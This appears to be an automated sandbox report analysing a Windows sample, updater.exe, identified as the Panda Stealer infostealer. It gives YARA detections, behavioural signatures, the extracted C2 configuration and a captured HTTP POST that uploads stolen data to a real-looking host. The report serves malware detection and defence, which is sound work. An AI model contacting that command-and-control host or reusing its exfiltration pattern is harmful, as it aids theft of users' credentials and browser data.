Edit tour

Windows Analysis Report
updater.exe

Overview

General Information

Sample Name:	updater.exe
Analysis ID:	1266489
MD5:	5b7111ae32c04c641c56e81a6293ec48
SHA1:	77331d9725c41635d6d449414c8a0d4ee00fac63
SHA256:	4cedab343fc4581149b13b7f6fd6532fa2c437550dee42926b37a93c6b5997f9
Infos:

Detection

Panda Stealer

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Yara detected Panda Stealer

Machine Learning detection for sample

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to dynamically determine API calls

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Searches the installation path of Mozilla Firefox

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to read the PEB

PE / OLE file has an invalid certificate

Uses Microsoft's Enhanced Cryptographic Provider

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Classification

Process Tree

System is w7x64

updater.exe (PID: 2364 cmdline: C:\Users\user\Desktop\updater.exe MD5: 5B7111AE32C04C641C56E81A6293EC48)

cleanup

Malware Configuration

Threatname: Panda Stealer

{"C2 url": "http://f0837288.xsph.ru", "Version": "1.11"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
updater.exe	JoeSecurity_PandaStealer	Yara detected Panda Stealer	Joe Security
updater.exe	MALWARE_Win_Alfonoso	Detects Alfonoso / Shurk / HunterStealer infostealer	ditekSHen	0x96a6c:$s1: %s\etilqs_ 0x96bcc:$s2: SELECT name, rootpage, sql FROM '%q'.%s 0x97338:$s2: SELECT name, rootpage, sql FROM '%q'.%s 0x96b80:$s3: %s-mj%08X 0x92e7c:$s8: recursive_directory_iterator 0x92e9a:$s8: recursive_directory_iterator 0x92eb8:$s8: recursive_directory_iterator 0x96194:$s9: 2E 7A 69 70 00 00 00 00 2E 7A 6F 6F 00 00 00 00 2E 61 72 63 00 00 00 00 2E 6C 7A 68 00 00 00 00 2E 61 72 6A 00 00 00 00 2E 67 7A 00 2E 74 67 7A 00 00 00 00 0x96a84:$s11: :memory: 0x92f28:$s12: current_path() 0x96b6c:$s13: vtab:%p:%p
updater.exe	MALWARE_Win_PandaStealer	Detects Panda Stealer	ditekSHen	0x96228:$s2: user.config 0x96a6c:$s4: %s\etilqs_ 0xa18a0:$s7: .?AV?$_Ref_count_obj2@U_Recursive_dir_enum_impl@filesystem@std@@@ 0x96ea8:$s8: UPDATE %Q.%s SET sql = substr(sql,1,%d) \|\| ', ' \|\| %Q \|\| substr 0x96d8d:$s9: \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (
updater.exe	Windows_Trojan_Pandastealer_8b333e76	unknown	unknown	0x9636c:$a1: ] - [user: 0x96378:$a2: [-] data unpacked failed 0x96350:$a3: [+] data unpacked 0x96288:$a4: \history\ 0x963d0:$a5: PlayerName

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000000.988088444.0000000001437000.00000002.00000001.01000000.00000003.sdmp	Windows_Trojan_Pandastealer_8b333e76	unknown	unknown	0x1096c:$a1: ] - [user: 0x10978:$a2: [-] data unpacked failed 0x10950:$a3: [+] data unpacked 0x10888:$a4: \history\ 0x109d0:$a5: PlayerName
00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmp	Windows_Trojan_Pandastealer_8b333e76	unknown	unknown	0x1096c:$a1: ] - [user: 0x10978:$a2: [-] data unpacked failed 0x10950:$a3: [+] data unpacked 0x10888:$a4: \history\ 0x109d0:$a5: PlayerName
Process Memory Space: updater.exe PID: 2364	JoeSecurity_PandaStealer	Yara detected Panda Stealer	Joe Security
Process Memory Space: updater.exe PID: 2364	Windows_Trojan_Pandastealer_8b333e76	unknown	unknown	0xf305:$a1: ] - [user: 0xf3a2:$a1: ] - [user: 0x313cd:$a1: ] - [user: 0x3146a:$a1: ] - [user: 0xf311:$a2: [-] data unpacked failed 0xf3ad:$a2: [-] data unpacked failed 0x313d9:$a2: [-] data unpacked failed 0x31475:$a2: [-] data unpacked failed 0xf2f3:$a3: [+] data unpacked 0x198d7:$a3: [+] data unpacked 0x27cd5:$a3: [+] data unpacked 0x313bb:$a3: [+] data unpacked 0xef74:$a4: \history\ 0x3103c:$a4: \history\ 0xf341:$a5: PlayerName 0x31409:$a5: PlayerName

Unpacked PEs

Source	Rule	Description	Author	Strings
1.0.updater.exe.13b0000.0.unpack	JoeSecurity_PandaStealer	Yara detected Panda Stealer	Joe Security
1.0.updater.exe.13b0000.0.unpack	MALWARE_Win_Alfonoso	Detects Alfonoso / Shurk / HunterStealer infostealer	ditekSHen	0x96a6c:$s1: %s\etilqs_ 0x96bcc:$s2: SELECT name, rootpage, sql FROM '%q'.%s 0x97338:$s2: SELECT name, rootpage, sql FROM '%q'.%s 0x96b80:$s3: %s-mj%08X 0x92e7c:$s8: recursive_directory_iterator 0x92e9a:$s8: recursive_directory_iterator 0x92eb8:$s8: recursive_directory_iterator 0x96194:$s9: 2E 7A 69 70 00 00 00 00 2E 7A 6F 6F 00 00 00 00 2E 61 72 63 00 00 00 00 2E 6C 7A 68 00 00 00 00 2E 61 72 6A 00 00 00 00 2E 67 7A 00 2E 74 67 7A 00 00 00 00 0x96a84:$s11: :memory: 0x92f28:$s12: current_path() 0x96b6c:$s13: vtab:%p:%p
1.0.updater.exe.13b0000.0.unpack	MALWARE_Win_PandaStealer	Detects Panda Stealer	ditekSHen	0x96228:$s2: user.config 0x96a6c:$s4: %s\etilqs_ 0xa18a0:$s7: .?AV?$_Ref_count_obj2@U_Recursive_dir_enum_impl@filesystem@std@@@ 0x96ea8:$s8: UPDATE %Q.%s SET sql = substr(sql,1,%d) \|\| ', ' \|\| %Q \|\| substr 0x96d8d:$s9: \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (
1.0.updater.exe.13b0000.0.unpack	Windows_Trojan_Pandastealer_8b333e76	unknown	unknown	0x9636c:$a1: ] - [user: 0x96378:$a2: [-] data unpacked failed 0x96350:$a3: [+] data unpacked 0x96288:$a4: \history\ 0x963d0:$a5: PlayerName
1.2.updater.exe.13b0000.0.unpack	JoeSecurity_PandaStealer	Yara detected Panda Stealer	Joe Security
1.2.updater.exe.13b0000.0.unpack	MALWARE_Win_Alfonoso	Detects Alfonoso / Shurk / HunterStealer infostealer	ditekSHen	0x96a6c:$s1: %s\etilqs_ 0x96bcc:$s2: SELECT name, rootpage, sql FROM '%q'.%s 0x97338:$s2: SELECT name, rootpage, sql FROM '%q'.%s 0x96b80:$s3: %s-mj%08X 0x92e7c:$s8: recursive_directory_iterator 0x92e9a:$s8: recursive_directory_iterator 0x92eb8:$s8: recursive_directory_iterator 0x96194:$s9: 2E 7A 69 70 00 00 00 00 2E 7A 6F 6F 00 00 00 00 2E 61 72 63 00 00 00 00 2E 6C 7A 68 00 00 00 00 2E 61 72 6A 00 00 00 00 2E 67 7A 00 2E 74 67 7A 00 00 00 00 0x96a84:$s11: :memory: 0x92f28:$s12: current_path() 0x96b6c:$s13: vtab:%p:%p
1.2.updater.exe.13b0000.0.unpack	MALWARE_Win_PandaStealer	Detects Panda Stealer	ditekSHen	0x96228:$s2: user.config 0x96a6c:$s4: %s\etilqs_ 0xa18a0:$s7: .?AV?$_Ref_count_obj2@U_Recursive_dir_enum_impl@filesystem@std@@@ 0x96ea8:$s8: UPDATE %Q.%s SET sql = substr(sql,1,%d) \|\| ', ' \|\| %Q \|\| substr 0x96d8d:$s9: \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (
1.2.updater.exe.13b0000.0.unpack	Windows_Trojan_Pandastealer_8b333e76	unknown	unknown	0x9636c:$a1: ] - [user: 0x96378:$a2: [-] data unpacked failed 0x96350:$a3: [+] data unpacked 0x96288:$a4: \history\ 0x963d0:$a5: PlayerName
Click to see the 3 entries

HTTP traffic detected: POST /collect.php HTTP/1.1Content-Type: multipart/form-data; boundary=SendFileZIPBoundaryUser-Agent: uploaderHost: f0837288.xsph.ruContent-Length: 1638104Connection: Keep-AliveCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: f0837288.xsph.ru

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Panda Stealer

Source: Yara match	File source: updater.exe, type: SAMPLE
Source: Yara match	File source: 1.0.updater.exe.13b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.updater.exe.13b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: updater.exe PID: 2364, type: MEMORYSTR

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_013CB7C3 GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,EnterCriticalSection,LeaveCriticalSection,DeleteDC,DeleteObject,ReleaseDC,

1_2_013CB7C3

System Summary

Malicious sample detected (through community Yara rule)

Source: updater.exe, type: SAMPLE	Matched rule: Detects Alfonoso / Shurk / HunterStealer infostealer Author: ditekSHen
Source: updater.exe, type: SAMPLE	Matched rule: Detects Panda Stealer Author: ditekSHen
Source: updater.exe, type: SAMPLE	Matched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
Source: 1.0.updater.exe.13b0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Alfonoso / Shurk / HunterStealer infostealer Author: ditekSHen
Source: 1.0.updater.exe.13b0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Panda Stealer Author: ditekSHen
Source: 1.0.updater.exe.13b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
Source: 1.2.updater.exe.13b0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Alfonoso / Shurk / HunterStealer infostealer Author: ditekSHen
Source: 1.2.updater.exe.13b0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Panda Stealer Author: ditekSHen
Source: 1.2.updater.exe.13b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
Source: 00000001.00000000.988088444.0000000001437000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
Source: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
Source: Process Memory Space: updater.exe PID: 2364, type: MEMORYSTR	Matched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown

Source: updater.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: updater.exe, type: SAMPLE	Matched rule: MALWARE_Win_Alfonoso snort2_sid = 920102, author = ditekSHen, description = Detects Alfonoso / Shurk / HunterStealer infostealer, clamav_sig = MALWARE.Win.Trojan.Alfonso, snort3_sid = 920100
Source: updater.exe, type: SAMPLE	Matched rule: MALWARE_Win_PandaStealer author = ditekSHen, description = Detects Panda Stealer
Source: updater.exe, type: SAMPLE	Matched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
Source: 1.0.updater.exe.13b0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Alfonoso snort2_sid = 920102, author = ditekSHen, description = Detects Alfonoso / Shurk / HunterStealer infostealer, clamav_sig = MALWARE.Win.Trojan.Alfonso, snort3_sid = 920100
Source: 1.0.updater.exe.13b0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_PandaStealer author = ditekSHen, description = Detects Panda Stealer
Source: 1.0.updater.exe.13b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
Source: 1.2.updater.exe.13b0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Alfonoso snort2_sid = 920102, author = ditekSHen, description = Detects Alfonoso / Shurk / HunterStealer infostealer, clamav_sig = MALWARE.Win.Trojan.Alfonso, snort3_sid = 920100
Source: 1.2.updater.exe.13b0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_PandaStealer author = ditekSHen, description = Detects Panda Stealer
Source: 1.2.updater.exe.13b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
Source: 00000001.00000000.988088444.0000000001437000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
Source: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
Source: Process Memory Space: updater.exe PID: 2364, type: MEMORYSTR	Matched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13

Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013C04AD	1_2_013C04AD
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013BC9EC	1_2_013BC9EC
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013CAF64	1_2_013CAF64
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013C9151	1_2_013C9151
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013C7009	1_2_013C7009
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013C3095	1_2_013C3095
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013B9294	1_2_013B9294
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013B3507	1_2_013B3507
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013BB653	1_2_013BB653
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013C1BD6	1_2_013C1BD6
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013B7D35	1_2_013B7D35
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013C3E7B	1_2_013C3E7B
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_01426129	1_2_01426129
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0141A340	1_2_0141A340
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0141836D	1_2_0141836D
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0142A3E3	1_2_0142A3E3
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013B8547	1_2_013B8547
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013C2431	1_2_013C2431
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0141C6F6	1_2_0141C6F6
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0142E93F	1_2_0142E93F
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0141493E	1_2_0141493E
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013D0B70	1_2_013D0B70
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0142EA5F	1_2_0142EA5F
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_01410F70	1_2_01410F70
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013F0EF6	1_2_013F0EF6
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0142CE9E	1_2_0142CE9E
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013D9082	1_2_013D9082
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_014253C4	1_2_014253C4
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_01431200	1_2_01431200
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013B72BC	1_2_013B72BC
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013F1702	1_2_013F1702
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013E364A	1_2_013E364A
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013E3818	1_2_013E3818

Source: C:\Users\user\Desktop\updater.exe	Code function: String function: 0140E2F3 appears 61 times
Source: C:\Users\user\Desktop\updater.exe	Code function: String function: 0140E2BF appears 80 times
Source: C:\Users\user\Desktop\updater.exe	Code function: String function: 0140E620 appears 39 times
Source: C:\Users\user\Desktop\updater.exe	Code function: String function: 01430CFC appears 75 times

Source: C:\Users\user\Desktop\updater.exe

Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory

Jump to behavior

Source: updater.exe

Static PE information: invalid certificate

Source: C:\Users\user\Desktop\updater.exe	Memory allocated: 77620000 page execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Memory allocated: 77740000 page execute and read and write			Jump to behavior

Source: updater.exe	Virustotal: Detection: 84%
Source: updater.exe	ReversingLabs: Detection: 91%

Source: updater.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\updater.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\updater.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\updater.exe

File created: C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE

Jump to behavior

Source: classification engine

Classification label: mal92.troj.spyw.winEXE@1/5@1/1

Source: updater.exe, updater.exe, 00000001.00000000.988088444.0000000001437000.00000002.00000001.01000000.00000003.sdmp, updater.exe, 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: updater.exe, 00000001.00000000.988088444.0000000001437000.00000002.00000001.01000000.00000003.sdmp, updater.exe, 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: updater.exe, updater.exe, 00000001.00000000.988088444.0000000001437000.00000002.00000001.01000000.00000003.sdmp, updater.exe, 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_013D39FA GetLastError,FormatMessageA,

1_2_013D39FA

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_013C6592 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,OpenProcess,QueryFullProcessImageNameA,Process32Next,Process32Next,

1_2_013C6592

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_013B433F LoadResource,LockResource,SizeofResource,

1_2_013B433F

Source: C:\Users\user\Desktop\updater.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\updater.exe

File opened: C:\Windows\SysWOW64\RichEd32.dll

Jump to behavior

Source: updater.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: updater.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0140E299 push ecx; ret	1_2_0140E2AC
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0140E664 push ecx; ret	1_2_0140E676
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_01430D1A push eax; ret	1_2_01430D50
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_01430D9A push ecx; ret	1_2_01430DA9
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_01430CFC push eax; ret	1_2_01430D18

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_013CA518 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

1_2_013CA518

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_013B3507 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_013B3507

Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\updater.exe TID: 1284

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\updater.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_014124FE VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,

1_2_014124FE

Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013F6107 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	1_2_013F6107
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013F61B5 GetLongPathNameW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,	1_2_013F61B5
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013F6127 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	1_2_013F6127

Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Roaming\Adobe\	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\	Jump to behavior

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_0140E44C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_0140E44C

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_014124FE VirtualProtect ?,-00000001,00000104,?,?,?,0000001C

1_2_014124FE

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_013CA518 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

1_2_013CA518

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_013B4455 GetProcessHeap,

1_2_013B4455

Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_01420095 mov eax, dword ptr fs:[00000030h]		1_2_01420095
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_01412780 mov eax, dword ptr fs:[00000030h]		1_2_01412780

Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0140E5AE SetUnhandledExceptionFilter,	1_2_0140E5AE
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0140E44C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0140E44C
